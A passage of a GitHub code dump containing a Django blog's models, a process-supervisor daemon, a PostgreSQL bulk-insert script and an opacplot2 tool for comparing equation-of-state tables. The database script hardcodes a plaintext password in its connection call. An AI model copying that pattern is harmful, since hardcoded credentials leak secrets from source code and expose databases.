verbose_name_plural = 'Сообщения'\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='Пост',\n help_text='Пост к которому оставлен комментарий',\n )\n author = models.ForeignKey(\n User,\n related_name='comments',\n verbose_name='Автор комментария',\n on_delete=models.CASCADE,\n )\n text = models.TextField(\n 'Комментарий',\n help_text='Напишите комментарий',\n )\n created = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-created']\n verbose_name = 'Комментарий'\n verbose_name_plural = 'Комментарии'\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n related_name='following',\n )\n\n def __str__(self):\n return f'{self.user} подписался на {self.author}'\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow',\n ),\n 
]\n","repo_name":"iliya12321/Yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14713296983","text":"import os\nimport time\nimport signal\nimport psutil\nfrom logger import Logger\nfrom process.process import Process\n\n\nclass Master:\n\n def __init__(self, child_process):\n self.__stop = False\n self.process = []\n self.logger = Logger(Master.__name__, 'musicdaemon')\n\n self.child_process = child_process\n self.num_process = len(self.child_process)\n\n def main(self):\n master_pid = os.getpid()\n self.logger.log(\"start\", \"Start Master, PID {0}\".format(master_pid))\n\n signal.signal(signal.SIGINT, self.stop)\n signal.signal(signal.SIGTERM, self.stop)\n\n process_class_index = 0\n for child_process_id in range(self.num_process):\n pid = os.fork()\n child_process = self.child_process[process_class_index]\n process_name = child_process.name\n process_class = child_process.process_class\n\n if pid == 0:\n process = Process(child_process.name)\n exit_code = process.main(process_class)\n exit(exit_code)\n else:\n self.logger.log(\"start\",\n \"Start {0} Process {1} Process-{2} PID {3}\".format(\n process_class.__name__, process_name, child_process_id, pid\n ))\n self.process.append({\"id\": child_process_id, \"pid\": pid, \"name\": process_name})\n\n process_class_index += 1\n\n while not self.__stop:\n # os.system(\"ps aux | awk '{ print $8 \" \" $2 }' | grep -w Z\")\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid'])\n for p in self.process:\n if pinfo['pid'] == p['pid']:\n # print(p['name'], proc.status())\n if proc.status() == \"zombie\":\n proc.kill()\n self.process.pop(self.process.index(p))\n # else:\n # print(p['name'], proc.status())\n except psutil.NoSuchProcess:\n pass\n if len(self.process) == 1 and self.process[0]['name'] == 'server':\n self.stop(signal.SIGINT, 0)\n time.sleep(1)\n\n self.logger.log(\"stop\", \"Stop Master, PID {0}\".format(os.getpid()))\n\n def stop(self, signum, frame):\n self.__stop = True\n self.logger.log(\"stop\", \"Receive Signal {0}\".format(signum))\n\n for process in self.process:\n self.logger.log(\"stop\",\n \"Send Signal {0} to {1} Process-{2} PID {3}\".format(\n signal.SIGTERM, process['name'], process['id'], process['pid']\n ))\n os.kill(process['pid'], signal.SIGTERM)\n os.kill(process['pid'], signal.SIGKILL)\n","repo_name":"whiteblue3/apoweroftrance-radio-system","sub_path":"musicdaemon/process/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2703321160","text":"import psycopg2\n\n\ndef bullk_insert_img_file(records):\n try:\n connection = psycopg2.connect(user = \"postgres\",\n password = \"Yash@171\",\n host = \"localhost\",\n port = \"5432\",\n database = \"File Handling\")\n\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS metadata_of_image_file\")\n cursor.execute(\"\"\"CREATE TABLE metadata_of_image_file(id SERIAL PRIMARY KEY,\n image_name VARCHAR(255),\n hash_value VARCHAR(255),\n model VARCHAR(255), \n date_time VARCHAR(255), \n image_size VARCHAR(255))\"\"\")\n # cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n sql_insert_query =\"\"\"INSERT INTO metadata_of_image_file (image_name,hash_value, model, date_time, 
image_size) \n VALUES(%s, %s, %s, %s, %s)\"\"\"\n # executemany() to insert multiple rows\n result = cursor.executemany(sql_insert_query, records)\n connection.commit()\n print(cursor.rowcount, \"Record inserted successfully into metadata of image files table\")\n\n except(Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into metadata of image file table {}\".format(error))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error while creating PostgreSQL table\", error)\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n","repo_name":"YashKalbande/ai-files-managment-software","sub_path":"ImgDatabase.py","file_name":"ImgDatabase.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74454974444","text":"import opacplot2 as opp\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport periodictable as ptab\nimport scipy as sp\nplt.rcParams.update({'text.usetex': False})\n\ndef get_input_data():\n\n parser = argparse.ArgumentParser(\n description=\"This script is used to check error differences\"\n \"between two files.\")\n\n\n\n parser.add_argument('-v', '--verbose',\n action='store_const', const=True,\n help='Verbosity option.')\n\n\n parser.add_argument('input_1',\n action='store', type=str,\n help='Input file 1.')\n\n parser.add_argument('input_2',\n action='store', type=str,\n help='Input file 2.')\n\n parser.add_argument('-f', '--filetypes',\n action='store', type=str,\n help='Input filetypes.')\n\n parser.add_argument('--mpi_1',\n action='store', type=str,\n help='Mass per ion for file 1.')\n\n parser.add_argument('--mpi_2',\n action='store', type=str,\n help='Mass per ion for file 2.')\n\n parser.add_argument('--Znum_1',\n action='store', type=str,\n help='Atomic numbers for file 1.')\n\n parser.add_argument('--Znum_2',\n action='store', type=str,\n help='Atomic numbers for file 2.')\n\n parser.add_argument('--Xfracs_1',\n action='store', type=str,\n help='Number fractions for file 1.')\n\n parser.add_argument('--Xfracs_2',\n action='store', type=str,\n help='Number fractions for file 2.')\n\n parser.add_argument('--filters_1',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 1 (g/cm^3, eV).')\n\n parser.add_argument('--filters_2',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 2 (g/cm^3, eV).')\n\n parser.add_argument('-p','--plot',\n action='store_const',\n const=True, default=False)\n\n parser.add_argument('--writelog',\n action='store_const',\n const=True, default=False,\n help='Write error values to file.')\n\n parser.add_argument('--lin_grid',\n action='store_const',\n const=True, default=False,\n help='Linear values for interpolated grid.')\n\n parser.add_argument('--tabnum_1',\n action='store', type=str,\n help='Specify the SESAME table number for file 1.')\n\n parser.add_argument('--tabnum_2',\n action='store', type=str,\n help='Specify the SESAME table number for file 2.')\n\n args = parser.parse_args()\n\n # Get the relevant paths and filenames.\n path_in_1 = os.path.abspath(args.input_1)\n path_in_2 = os.path.abspath(args.input_2)\n\n basedir_1, fn_1 = os.path.split(path_in_1)\n basedir_2, fn_2 = os.path.split(path_in_2)\n\n # Split filename twice in case of MULTI files (.opr.gz, etc)\n basename_1 = 
os.path.splitext(os.path.splitext(fn_1)[0])[0]\n basename_2 = os.path.splitext(os.path.splitext(fn_2)[0])[0]\n\n # Create lists for filetypes.\n if args.filetypes is not None:\n args.filetypes = [typ for typ in args.filetypes.split(',')]\n\n if args.Znum_1 is not None:\n args.Znum_1 = [num for num in args.Znum_1.split(',')]\n if args.Znum_2 is not None:\n args.Znum_2 = [num for num in args.Znum_2.split(',')]\n\n # Convert mpis to float.\n if args.mpi_1 is not None:\n args.mpi_1 = float(args.mpi_1)\n if args.mpi_2 is not None:\n args.mpi_2 = float(args.mpi_2)\n\n # Convert xfracs to float list.\n if args.Xfracs_1 is not None:\n args.Xfracs_1 = [float(x) for x in args.Xfracs_1.split(',')]\n if args.Xfracs_2 is not None:\n args.Xfracs_2 = [float(x) for x in args.Xfracs_2.split(',')]\n\n # Set defaults for SESAME filters.\n if args.filters_1 is not None:\n args.filters_1 = [float(num) for num in args.filters_1.split(',')]\n else:\n args.filters_1 = [0., 0.,]\n if args.filters_2 is not None:\n args.filters_2 = [float(num) for num in args.filters_2.split(',')]\n else:\n args.filters_2 = [0., 0.,]\n\n # Convert tabnum into int.\n if args.tabnum_1 is not None:\n try:\n args.tabnum_1 = int(args.tabnum_1)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 1.')\n if args.tabnum_2 is not None:\n try:\n args.tabnum_2 = int(args.tabnum_2)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 2.')\n\n\n input_data = {'args':args,\n 'basename_1':basename_1,\n 'basename_2':basename_2,\n 'path_in_1':path_in_1,\n 'path_in_2':path_in_2,\n 'basedir_1':basedir_1,\n 'basedir_2':basedir_2,\n 'fn_1':fn_1,\n 'fn_2':fn_2}\n\n\n return input_data\n\ndef read_format_ext(args, f_1, f_2):\n # Try to read from the input file extension.\n ext_dict = {'.prp':'propaceos',\n '.eps':'multi',\n '.opp':'multi',\n '.opz':'multi',\n '.opr':'multi',\n '.mexport':'sesame-qeos',\n '.ses':'sesame',\n '.cn4':'ionmix'}\n\n # If the input file is compressed, choose the next extension.\n if os.path.splitext(f_1)[1] == '.gz':\n _, ext_1 = os.path.splitext(os.path.splitext(f_1)[0])\n else:\n _, ext_1 = os.path.splitext(f_1)\n\n if os.path.splitext(f_2)[1] == '.gz':\n _, ext_2 = os.path.splitext(os.path.splitext(f_2)[0])\n else:\n _, ext_2 = os.path.splitext(f_2)\n\n # Choose the correct input type based on extension and set args.input\n # accordingly.\n args.filetypes = []\n if ext_1 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_1]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_1))\n if ext_2 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_2]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_2))\n\nclass Formats_Read(object):\n \"\"\"\n Reads in a file and returns an object with useful attributes based on the\n corresponding opacplot2 object. This class also includes the naming\n conventions for each format.\n\n\n This procedure is preferred (although it is rather redundant with the\n rest of opacplot2) since it preserves the original structure of the\n opacplot2 object & all calculations & processing is done in this class\n alone. 
This way, the mechanisms are more transparent for error checking.\n\n\n Returns\n -------\n Formats_Read\n Formats_Read().data is the opacplot2 object corresponding to the input\n file.\n\n Formats_Read().ft is the filetype of the input file.\n\n Formats_Read().common_keys are the \"common dictionary style\" keys for\n opacplot2.\n \"\"\"\n\n # Names dictionaries.\n # Convert \"common dictionary style\" keys -> Format keys\n propaceos_names_dict = {'idens' : 'nion',\n 'temp' : 'temp',\n 'dens' : 'dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'eint',\n 'Uec_DT' : 'eele',\n 'Ui_DT' : 'eion',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'opp_mg' : 'opp_mg',\n 'opr_mg' : 'opr_mg',\n 'emp_mg' : 'emp_mg',\n 'opp_int' : 'opp_int',\n 'opr_int' : 'opr_int',\n 'emp_int' : 'emp_int',\n 'Znum' : 'Znum',\n 'Anum' : 'Anum',\n 'Xnum' : 'Xnum',\n 'Anum_prp': 'Anum_prp',\n 'groups' : 'groups',\n 'Zsymb' : 'Zsymb',\n 'BulkMod' : 'BulkMod',\n 'ElemNum' : 'ElemNum',\n 'Abar' : 'Abar',\n 'Zmax' : 'Zmax'}\n\n multi_names_dict = {'idens':'idens',\n 'temp':'temp',\n 'dens':'dens',\n 'Zf_DT':'zbar',\n 'opp_mg':'opp_mg',\n 'opr_mg':'opr_mg',\n 'Znum':'Znum',\n 'Anum':'Anum',\n 'Xnum':'Xnum',\n 'groups':'groups',\n 'Abar':'Abar',\n 'Zmax':'Zmax',\n 'emp_mg':'emp_mg'}\n\n sesame_names_dict = {'idens':'idens',\n 'temp':'ele_temps',\n 'dens':'ele_dens',\n 'Zf_DT':'zbar',\n 'Ut_DT':'total_eint',\n 'Uec_DT':'ele_eint',\n 'Ui_DT':'ioncc_eint',\n 'Pi_DT':'ioncc_pres',\n 'Pec_DT':'ele_pres',\n 'Znum':'Znum',\n 'Xnum':'Xnum',\n 'BulkMod':'bulkmod',\n 'Abar':'abar',\n 'Zmax':'zmax'}\n\n\n sesame_qeos_names_dict = {'idens' : 'idens',\n 'temp' : 'ele_temps',\n 'dens' : 'ele_dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'total_eint',\n 'Uec_DT' : 'ele_eint',\n 'Ui_DT' : 'ion_eint',\n 'Pi_DT' : 'ion_pres',\n 'Pec_DT' : 'ele_pres',\n 'Znum' : 'Znum',\n 'Xnum' : 'Xnum',\n 'BulkMod' : 'bulkmod',\n 'Abar' : 'abar',\n 'Zmax' : 'zmax'}\n\n\n ionmix_names_dict = {'Znum' : 'zvals',\n 'Xnum' : 'fracs',\n 'idens' : 'numDens',\n 'temp' : 'temps',\n 'Zf_DT' : 'zbar',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'Ui_DT' : 'eion',\n 'Uec_DT' : 'eele',\n 'groups' : 'opac_bounds',\n 'opr_mg' : 'rosseland',\n 'opp_mg' : 'planck_absorb',\n 'emp_mg' : 'planck_emiss'}\n\n # Inverted names: Convert format keys -> \"common dictionary style\" keys\n propaceos_names_dict_inv = {v:k for k, v\n in propaceos_names_dict.items()}\n multi_names_dict_inv = {v:k for k, v\n in multi_names_dict.items()}\n sesame_names_dict_inv = {v:k for k, v\n in sesame_names_dict.items()}\n sesame_qeos_names_dict_inv = {v:k for k, v\n in sesame_qeos_names_dict.items()}\n ionmix_names_dict_inv = {v:k for k, v\n in ionmix_names_dict.items()}\n\n def __init__(self, form, basedir, basename, path_in,\n mpi=None, znum=None, xnum=None,\n filters=[0.,0.], verbose=False, tabnum=None):\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Set attributes.\n self.form = form\n self.basedir = basedir\n self.basename = basename\n self.path_in = path_in\n self.mpi = mpi\n self.znum = znum\n self.filters = filters\n self.verbose = verbose\n self.xnum = xnum\n self.tabnum = tabnum\n\n # For SESAME, we need the hedp package to calculate zbar.\n need_hedp_list = ['sesame', 'sesame-qeos']\n if self.form in need_hedp_list:\n try:\n global hedp\n import hedp.eos\n except ImportError:\n raise ImportError('You need the hedp module. 
You can get it here: '\n                                  'https://github.com/luli/hedp.')\n\n        # Use handle_dict to create the eos_dict based on the input format.\n        try:\n            self.data = self.handle_dict[self.form]()\n            self.ft = self.form\n        except KeyError:\n            raise KeyError('{} is not a valid format name!'.format(self.form))\n\n    def set_handle_dict(self):\n        self.handle_dict = {'propaceos' : self.propaceos_read,\n                            'multi' : self.multi_read,\n                            'sesame' : self.sesame_read,\n                            'sesame-qeos' : self.sesame_qeos_read,\n                            'ionmix' : self.ionmix_read}\n\n    def propaceos_read(self):\n        # If we are unable to find the correct script for opg_propaceos\n        # we need to let the user know.\n        try:\n            import opacplot2.opg_propaceos\n            op = opp.opg_propaceos.OpgPropaceosAscii(self.path_in)\n            self.common_keys = [self.propaceos_names_dict_inv[key]\n                                for key in op.keys()\n                                if key in self.propaceos_names_dict_inv.keys()]\n            return op\n        except ImportError:\n            raise ImportError('You do not have the opg_propaceos script.')\n\n    def multi_read(self):\n        op = opp.OpgMulti.open_file(self.basedir, self.basename)\n\n        # Decide if we need Znum, and Xnum, calculate Anum if it is not given.\n        if self.znum is None:\n            if 'Znum' in op:\n                self.znum = op['Znum']\n            else:\n                raise ValueError('Znum Varray should be provided!')\n        if type(self.znum) is int:\n            self.znum = [self.znum]\n        op['Znum'] = np.array(self.znum, dtype='int')\n        op['Anum'] = np.array([ptab.elements[el].mass for el in op['Znum']])\n        if self.xnum is None:\n            if len(self.znum) == 1:\n                op['Xnum'] = np.array([1.0])\n            else:\n                raise ValueError('Xnum array should be provided')\n        else:\n            # use the user-supplied number fractions (was `Xnum`, an undefined name)\n            op['Xnum'] = np.array(self.xnum)\n\n        # Setting more attributes.\n        op['Abar'] = np.sum(op['Xnum']*op['Anum'])\n        op['Zmax'] = np.sum(op['Xnum']*op['Znum'])\n        op['idens'] = op['dens']*opp.NA/op['Abar']\n        self.common_keys = [self.multi_names_dict_inv[key]\n                            for key in op.keys()\n                            if key in self.multi_names_dict_inv.keys()]\n        return op\n\n    def sesame_read(self):\n        # TODO Add options for single vs double\n        if self.verbose:\n            print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n        # Try SINGLE precision and then DOUBLE if that doesn't work.\n        try:\n            op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n        except ValueError:\n            op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n        \n        # If there is more than one table, fail. Use sesame-extract\n        # to create a one-table file.\n        if len(op.data.keys()) > 1:\n            raise Warning('More than one material ID found. 
'\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n \n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n if self.verbose:\n print('Setting the atomic numbers...')\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ioncc'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=False)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_names_dict_inv.keys()]\n\n return op\n\n def sesame_qeos_read(self):\n raise Warning('QEOS-SESAME is not ready yet!')\n\n if self.verbose:\n print('Opening up QEOS SESAME file {}...'.format(self.path_in))\n # Try SINGLE precision and then DOUBLE if that doesn't work.\n try:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.SINGLE)\n except ValueError:\n op = opp.OpgSesame(self.path_in, opp.OpgSesame.DOUBLE)\n if len(op.data.keys()) > 1:\n raise Warning('More than one material ID found. 
'\n 'Use sesame-extract to create a file '\n 'with only one material first.')\n\n if self.tabnum is not None:\n table_key = self.tabnum\n else:\n if self.verbose:\n print('Selecting the last table available...')\n # Select the last table (newest) table available.\n table_key = sorted(op.data.keys())[-1]\n\n # Sesame needs Znum.\n if self.znum is None:\n if 'Znum' in op.data[table_key].keys():\n self.znum = op.data[table_key]['Znum']\n else:\n raise ValueError('Znum Varray should be provided!')\n\n op.data[table_key]['Znum'] = np.array(self.znum, dtype='int')\n\n if self.verbose:\n print('Merging the Ion and '\n 'Electron temperature and density grids...')\n # We must merge ion_ and ele_ grids for qeos-sesame data.\n # Then we can calculate zbar using hedp module.\n op.data[table_key] = opp.utils.EosMergeGrids(\n op.data[table_key], intersect=['ele', 'ion'],\n filter_dens=lambda x: (x>self.filters[0]),\n filter_temps=lambda x: (x>self.filters[1]),\n qeos=True)\n\n if self.verbose:\n print('Calculating average ionization...')\n dens_arr, temp_arr = np.meshgrid(op.data[table_key]['ele_dens'],\n op.data[table_key]['ele_temps'])\n\n zbar = hedp.eos.thomas_fermi_ionization(\n dens_arr, temp_arr,\n op.data[table_key]['Znum'],\n op.data[table_key]['abar']).T\n\n op.data[table_key]['zbar'] = zbar\n\n if self.verbose:\n print('Calculating number densities...')\n # Add in number density key.\n op.data[table_key]['idens'] = ((op.data[table_key]['ele_dens']\n * opp.NA)\n / op.data[table_key]['abar'])\n\n # Create a list of the \"common dictionary format\" keys.\n self.common_keys = [self.sesame_qeos_names_dict_inv[key]\n for key in op.data[table_key].keys()\n if key in self.sesame_qeos_names_dict_inv.keys()]\n\n return op\n\n def ionmix_read(self):\n if self.verbose:\n print('Opening up IONMIX file {}...'.format(self.path_in))\n if self.mpi is None:\n raise Warning('Need mpi for ionmix!')\n else:\n # TODO Add options for man and twot\n op = opp.OpacIonmix(self.path_in, self.mpi, man=True, twot=True)\n self.common_keys = [self.ionmix_names_dict_inv[attr]\n for attr in dir(op)\n if attr in self.ionmix_names_dict_inv.keys()]\n return op\n\nclass get_eos_array(object):\n \"\"\"\n Gets an EoS array based on the input opacplot2 object.\n \"\"\"\n def __init__(self, eos, arr):\n\n # Initialize the dictionary for handling functions.\n self.set_handle_dict()\n\n # Use handle_dict to create the eos_dict based on the input format.\n try:\n self.arr = self.handle_dict[eos.ft](eos, arr)\n # TODO fix this, error handling is not useful since key erros come\n # from everywhere in this class.\n except KeyError:\n raise KeyError('{} is not a valid format name!'.format(eos.ft))\n\n def set_handle_dict(self):\n self.handle_dict = {'propaceos' : self.propaceos,\n 'multi' : self.multi,\n 'sesame' : self.sesame,\n 'sesame-qeos' : self.sesame_qeos,\n 'ionmix' : self.ionmix}\n\n def propaceos(self, eos, arr):\n return eos.data[Formats_Read.propaceos_names_dict[arr]]\n\n def multi(self, eos, arr):\n return eos.data[Formats_Read.multi_names_dict[arr]]\n\n def sesame(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n data_dict = eos.data.data[table_key]\n return data_dict[Formats_Read.sesame_names_dict[arr]]\n\n def sesame_qeos(self, eos, arr):\n if eos.tabnum is None:\n # Select the last table (newest) table available.\n table_key = sorted(eos.data.data.keys())[-1]\n else:\n table_key = eos.tabnum\n 
data_dict = eos.data.data[table_key]\n        return data_dict[Formats_Read.sesame_qeos_names_dict[arr]]\n\n    def ionmix(self, eos, arr):\n        return getattr(eos.data, Formats_Read.ionmix_names_dict[arr])\n\ndef compare_eos(eos_1, eos_2, verbose=False,\n                plot=False,\n                write_log_file=False,\n                lin_grid=False):\n\n    logfile_name = 'eos_errors.txt'\n\n    # Union of all \"common dictionary format\" keys to do a full error report.\n    # Not including 'idens', 'dens', 'temp', 'groups', 'opp_mg', 'opp_int',\n    # 'opr_int', 'emp_mg', 'opr_mg', 'emp_int', 'Abar','Zmax', 'Ut_DT',\n    # 'Znum', 'BulkMod', 'Xnum', 'Anum', 'Zsymb', 'ElemNum', 'Anum_prp'.\n    # (aka no opacity data currently).\n    # TODO add opacity comparison capabilities.\n    keys = ['Pec_DT', 'Zf_DT', 'Pi_DT', 'Uec_DT', 'Ui_DT']\n\n    shared_keys = [key for key in keys\n                   if key in eos_1.common_keys\n                   and key in eos_2.common_keys]\n\n    if verbose:\n        err_report_str = 'Performing error report on:\\n'\n        for i in range(len(shared_keys)):\n            err_report_str += '{}. {}\\n'.format((i+1), shared_keys[i])\n        print(err_report_str)\n\n    # Perform error report using number densities.\n    error_report = []\n\n    # Freak out if there is no number density.\n    if 'idens' not in eos_1.common_keys or 'idens' not in eos_2.common_keys:\n        raise Warning('No number density data!')\n\n    # Get the temperature and density arrays.\n    dens_1 = get_eos_array(eos_1, 'idens').arr\n    temp_1 = get_eos_array(eos_1, 'temp').arr\n    dens_2 = get_eos_array(eos_2, 'idens').arr\n    temp_2 = get_eos_array(eos_2, 'temp').arr\n\n    # These will be used for the interpolator function `griddata`.\n    d_interp_1, t_interp_1 = np.meshgrid(dens_1, temp_1)\n    d_interp_2, t_interp_2 = np.meshgrid(dens_2, temp_2)\n\n    # Creating a new grid to interpolate onto.\n    d = opp.utils.intersect_1D_sorted_arr(dens_1, dens_2)\n    t = opp.utils.intersect_1D_sorted_arr(temp_1, temp_2)\n    D_new, T_new = np.meshgrid(d,t)\n\n    if (d is None) or (t is None):\n        raise Warning('Density and temperature arrays must have some overlap!')\n    if verbose:\n        print('Density range: {:.5E} to {:.5E} #/cm^3.'.format(d[0], d[-1]))\n        print('Temperature range: {:.5E} to {:.5E} eV.'.format(t[0], t[-1]))\n        print('Generating error report...')\n\n    fn_1 = os.path.split(eos_1.path_in)[1]\n    fn_2 = os.path.split(eos_2.path_in)[1]\n\n    if write_log_file:\n        # Append heading for our current grid.\n        with open(logfile_name, 'a') as f:\n            f.write('Files: {}, {}\\n'.format(fn_1, fn_2))\n            f.write('[Array, RMS Error, Absolute Error]\\n')\n\n    # Do analysis on each of the shared keys.\n    for key in shared_keys:\n        # Get the data.\n        data_1 = get_eos_array(eos_1, key).arr\n        data_2 = get_eos_array(eos_2, key).arr\n\n        # Use interpolation to account for mismatched grid sizes.\n        # `rescale=True` to account for the orders of magnitude difference\n        # in the dens/temp grids.\n        # `scipy.interpolate.interp2d` was not giving accurate interpolation.\n        # I believe this is due to the orders of magnitude difference also,\n        # which `griddata` can easily fix. 
- JT\n # Additionally, `griddata` is much faster than using an interpolator\n # function to fill an empty grid.\n interp_data_1 = sp.interpolate.griddata(\n (d_interp_1.flatten(), t_interp_1.flatten()),\n data_1.T.flatten(),\n (D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n interp_data_2 = sp.interpolate.griddata(\n (d_interp_2.flatten(), t_interp_2.flatten()),\n data_2.T.flatten(),(D_new.flatten(), T_new.flatten()),\n rescale=True,\n method='linear')\n\n interp_data_1 = interp_data_1.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_2 = interp_data_2.reshape(D_new.shape[0], D_new.shape[1])\n interp_data_1 = interp_data_1.T\n interp_data_2 = interp_data_2.T\n\n err_1_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_1)\n err_2_sqr = np.square((interp_data_1 - interp_data_2)/interp_data_2)\n\n err_1_rms = np.sqrt(err_1_sqr.mean())\n err_2_rms = np.sqrt(err_2_sqr.mean())\n err_rms = max(err_1_rms, err_2_rms)\n\n err_1_abs = np.sqrt(np.max(err_1_sqr))\n err_2_abs = np.sqrt(np.max(err_2_sqr))\n err_abs = max(err_1_abs, err_2_abs)\n\n fmt='%.0f %%'\n if plot:\n titles = {'Zf_DT':'Average Ionization',\n 'Pec_DT':'Electron Pressure',\n 'Pi_DT':'Ion Pressure',\n 'Uec_DT':'Electron Energy',\n 'Ui_DT':'Ion Energy'}\n\n fig, axarr = plt.subplots(1,3)\n x, y = np.meshgrid(d, t)\n res_levels = {0:.1, 1:.01, 2:.0001 }\n fig.set_size_inches(21, 6)\n\n for i in range(3):\n levels = np.linspace(0, res_levels[i], 256)\n cs = axarr[i].contourf(x, y, np.sqrt(err_1_sqr).T,\n levels, extend='max')\n cb = plt.colorbar(cs, ax=axarr[i])\n cb.formatter = matplotlib.ticker.FuncFormatter(lambda x,p: '{:.1e}%'.format(float(x)*100))\n cb.update_ticks()\n if i==2:\n cb.set_label('% Error')\n if not lin_grid:\n axarr[i].loglog()\n axarr[i].set_xlim((d[0], d[-1]))\n axarr[i].set_ylim((t[0], t[-1]))\n axarr[i].set_xlabel('rho [#/cm^(3)]')\n axarr[i].set_ylabel('T [eV]')\n\n fig.tight_layout()\n fig.suptitle('{} % Error for {} vs. 
{}'.format(titles[key], fn_1, fn_2))\n fig.subplots_adjust(top=0.85)\n fig.savefig('{}.png'.format(key+'_err'))\n\n if write_log_file:\n with open(logfile_name, 'a') as f:\n f.write('{}, {}, {}\\n'.format(key, err_rms, err_abs))\n\n print('Error statistics for {}:'.format(key))\n print('RMS % Error: {:.5e}.'.format(err_rms*100))\n print('Max % Absolute Error: {:.5e}.'.format(err_abs*100))\n\ndef check_error():\n input_data = get_input_data()\n\n if input_data['args'].filetypes is None:\n read_format_ext(input_data['args'],\n input_data['fn_1'],\n input_data['fn_2'])\n\n eos_1 = Formats_Read(input_data['args'].filetypes[0],\n input_data['basedir_1'],\n input_data['basename_1'],\n input_data['path_in_1'],\n mpi=input_data['args'].mpi_1,\n znum=input_data['args'].Znum_1,\n xnum=input_data['args'].Xfracs_1,\n filters=input_data['args'].filters_1,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_1)\n\n eos_2 = Formats_Read(input_data['args'].filetypes[1],\n input_data['basedir_2'],\n input_data['basename_2'],\n input_data['path_in_2'],\n mpi=input_data['args'].mpi_2,\n znum=input_data['args'].Znum_2,\n xnum=input_data['args'].Xfracs_2,\n filters=input_data['args'].filters_2,\n verbose=input_data['args'].verbose,\n tabnum=input_data['args'].tabnum_2)\n\n compare_eos(eos_1, eos_2, verbose=input_data['args'].verbose,\n plot=input_data['args'].plot,\n write_log_file=input_data['args'].writelog,\n lin_grid=input_data['args'].lin_grid)\n\nif __name__=='__main__':\n 